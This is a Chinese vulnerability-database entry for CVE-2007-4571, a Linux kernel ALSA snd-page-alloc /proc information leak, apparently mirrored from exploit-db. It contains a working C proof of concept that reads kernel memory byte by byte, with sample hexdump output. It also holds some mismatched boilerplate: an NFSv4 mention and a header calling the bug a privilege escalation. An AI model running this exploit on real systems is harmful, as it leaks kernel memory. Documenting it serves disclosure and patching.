Linux Kernel ALSA驱动snd-page-alloc本地Proc文件信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113669 漏洞类型 边界条件错误
发布时间 2007-09-21 更新时间 2008-06-20
CVE编号 CVE-2007-4571 CNNVD-ID CNNVD-200709-386
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/30605
https://www.securityfocus.com/bid/25807
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-386
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。Linux系统的ALSA声卡驱动实现上存在漏洞,本地攻击者可能利用此漏洞获取内核内存中的敏感信息。LinuxKernel在处理多个/proc/driver/snd-page-alloc文件的读操作时存在安全漏洞,sound/core/memalloc.c文件中如下定义了读操作的系统调用snd_mem_proc_read:484staticintsnd_mem_proc_read(char*page,char**start,off_toff,485intcount,int*eof,void*data)486{487intlen=0;...494len+=snprintf(page+len,count-len,495"pages:%libytes(%lipagesper%likB)\n",496pages*PAGE_SIZE,pages,PAGE_SIZE/1024);...508returnlen;509}在494行调用了snprintf以生成proc文件系统项的输出,如果提供了计数值1,snprintf就会仅向目标缓冲区写入单个字节,但如果有足够空间的话,函数就会返回应写入的字节数。没有设置过*eof值,也没有使用过*ppos值。fs/proc/generic.c文件中定义了从proc_file_read调用的这个函数:51staticssize_t52proc_file_read(structfile*file,char__user*buf,size_tnbytes,53loff_t*ppos)54{...136n=dp->read_proc(page,&start,*ppos,137count,&eof,dp->data);...155n-=*ppos;156if(n<=0)157break;158if(n>count)159n=count;160start=page+*ppos;...186n-=copy_to_user(buf,start<page?page:start,n);...193*ppos+=start<page?(unsignedlong)start:n;在136行从对snd_proc_mem
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/25774/info
 
/*
The Linux kernel is prone to a local privilege-escalation vulnerability.
 
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
 
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. 
*/


/*
 *****************************************************************************************
 * by Karimo_DM under GPL                                                                *
 *                                                                                       *
 * Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability *
 * CVE-2007-4571                                                                         *
 *                                                                                       *
 * This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version        * 
 * 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing     *
 * parts of kernel memory (reaveling randomly some risky informations).               	 *
 *                                                                                       *
 * karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa          *
 * karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C                        *
 * 00000000  00 03 55 55 27 00 00 00  10 50 12 08 1e 50 12 08  |..UU'....P...P..|        *
 * 00000010  4f 53 46 30 30 30 31 30  30 32 30 2f 2f 00 41 4e  |OSF00010020//.AN|        *
 * 00000020  53 49 5f 58 33 2e 34 2d  31 39 00 03 55 55 27 00  |SI_X3.4-19..UU'.|        *
 * 00000030  00 00 10 50 12 08 1e 50  12 08 4f 53 46 30 30 30  |...P...P..OSF000|        *
 * 00000040  31 30 30 32 30 2f 2f 00  41 4e 53 49 5f 58 33 2e  |10020//.ANSI_X3.|        *
 * 00000050  34 2d 31 39 00 03 55 55  27 00 00 00 10 50 12 08  |4-19..UU'....P..|        *
 * 00000060  1e 50 12 08 4f 53 46 30  30 30 31 30 30 32 30 2f  |.P..OSF00010020/|        *
 * 00000070  2f 00 41 4e 53 49 5f 58  33 2e 34 2d 31 39 00 03  |/.ANSI_X3.4-19..|        *
 * 00000080  55 55 27 00 00 00 10 50  12 08 1e 50 12 08 4f 53  |UU'....P...P..OS|        *
 * 00000090  46 30 30 30 31 30 30 32  30 2f 2f 00 41 4e 53 49  |F00010020//.ANSI|        *
 * ...                                                                                   *
 * 000051d0  00 02 20 00 78 ce ed da  c0 43 93 c4 01 80 00 4d  |.. .xÎíÚÀC.Ä...M|        *
 * 000051e0  71 88 9d 3c 04 27 0d 5d  80 ec 19 2f 12 8a 42 9d  |q..<.'.].ì./..B.|        *
 * 000051f0  80 2e 9f c7 89 2c 87 ca  97 dd 50 8a e3 fa c3 15  |...Ç.,.Ê.ÝP.ãúÃ.|        *
 * 00005200  a2 3e 37 49 93 c4 01 80  00 4d 71 88 9d 3c 04 27  |¢>7I.Ä...Mq..<.'|        *
 * 00005210  0d 5d 80 ec 19 2f 12 8a  42 9d 80 2e 9f c7 89 2c  |.].ì./..B....Ç.,|        *
 * 00005220  87 ca 97 dd 50 8a e3 fa  c3 15 a2 3e 37 49 93 c4  |.Ê.ÝP.ãúÃ.¢>7I.Ä|        *
 * ...                                                                                   *
 *                                                                                       *
 *                                                                                       *
 * [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ]          *
 *****************************************************************************************
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

#define _SOME_NUM 0xffff

int main() {
  unsigned int j;
  char kern_mem[2];
  int fd=open("/proc/driver/snd-page-alloc",O_RDONLY);
  for (j=0;j<(unsigned int)_SOME_NUM;j++) {
    memset(kern_mem,0,2);
    /* That 1 really do the job ;P */
    if (!read(fd,kern_mem,1)) {
      close(fd);
      fd=open("/proc/driver/snd-page-alloc",O_RDONLY);
    } else printf("%c",kern_mem[0]);
  }
}
|受影响的产品
Ubuntu Ubuntu Linux 7.10 sparc Ubuntu Ubuntu Linux 7.10 powerpc Ubuntu Ubuntu Linux 7.10 lpia Ubuntu Ubuntu Linux 7.10 i386 Ubuntu Ubuntu Linux 7.10 amd64 Ubuntu Ubuntu L
|参考资料

来源:UBUNTU
名称:USN-618-1
链接:http://www.ubuntu.com/usn/usn-618-1
来源:SECUNIA
名称:30769
链接:http://secunia.com/advisories/30769
来源:IDEFENSE
名称:20070925LinuxKernelALSAsnd_mem_proc_readInformationDisclosureVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=600
来源:kernel.org
链接:http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.8
来源:git.kernel.org
链接:http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ccec6e2c4a74adf76ed4e2478091a311b1806212
来源:FEDORA
名称:FEDORA-2007-2349
链接:https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00436.html
来源:FEDORA
名称:FEDORA-2007-714
链接:https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00083.html
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1761
来源:XF
名称:linux-sndpagealloc-information-disclosure(36780)
链接:http://xforce.iss.net/xforce/xfdb/36780
来源:SECTRACK
名称:1018734
链接:http://www.securitytracker.com/id?1018734
来源:BID
名称:25807
链接:http://www.se